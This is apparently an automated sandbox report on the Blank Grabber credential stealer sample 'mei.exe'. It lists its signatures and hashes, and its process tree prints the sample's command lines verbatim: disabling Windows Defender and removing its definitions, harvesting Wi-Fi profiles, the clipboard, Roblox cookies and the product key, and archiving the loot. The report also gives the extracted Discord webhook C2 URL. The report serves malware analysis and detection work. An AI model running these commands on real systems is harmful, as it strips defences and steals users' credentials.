
Windows Analysis Report
mei.exe

Overview

General Information

Sample name: mei.exe
Analysis ID: 1354458
MD5: b5479bf5c97cfa81c02676bb9335ab24
SHA1: e823a36420bdeccfd8e4c6ad9d14e863263caac7
SHA256: 02c36b712aeaad34359c72311c8624062ea5dfc6311a15ed2b46b403470c3bc0
Tags: exe

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
DLL side loading technique detected
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Modifies Windows Defender protection settings
Potential dropper URLs found in powershell memory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Too many similar processes found
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mei.exe (PID: 7468 cmdline: C:\Users\user\Desktop\mei.exe MD5: B5479BF5C97CFA81C02676BB9335AB24)
    • mei.exe (PID: 7484 cmdline: C:\Users\user\Desktop\mei.exe MD5: B5479BF5C97CFA81C02676BB9335AB24)
      • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7636 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7676 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 8420 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7760 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7840 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8068 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8152 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7256 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2724 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5996 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7772 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8100 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7292 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5796 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5804 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8112 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7388 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2200 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8028 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 2500 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8228 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8448 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8592 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8404 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8632 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8700 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8764 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8788 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8864 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9096 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9152 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7584 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7780 cmdline: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7356 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8376 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7236 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5756 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7644 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8524 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8316 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8416 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8588 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
(12 entries in total; 5 shown)

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

Stealing of Sensitive Information

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\mei.exe, ParentImage: C:\Users\user\Desktop\mei.exe, ParentProcessId: 7484, ParentProcessName: mei.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7752, ProcessName: cmd.exe

No Snort rule has matched


AV Detection

Source: mei.exe; Avira: detected
Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr; Avira: detection malicious, Label: HEUR/AGEN.1351111
Source: mei.exe.7484.1.memstrmin; Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr; ReversingLabs: Detection: 35%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr; Virustotal: Detection: 48%
Source: mei.exe; Virustotal: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe; Code function: 89_2_00007FF7D79D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 89_2_00007FF7D79D901C
Source: mei.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mei.exe, 00000001.00000002.2042234592.00007FFE11EC1000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
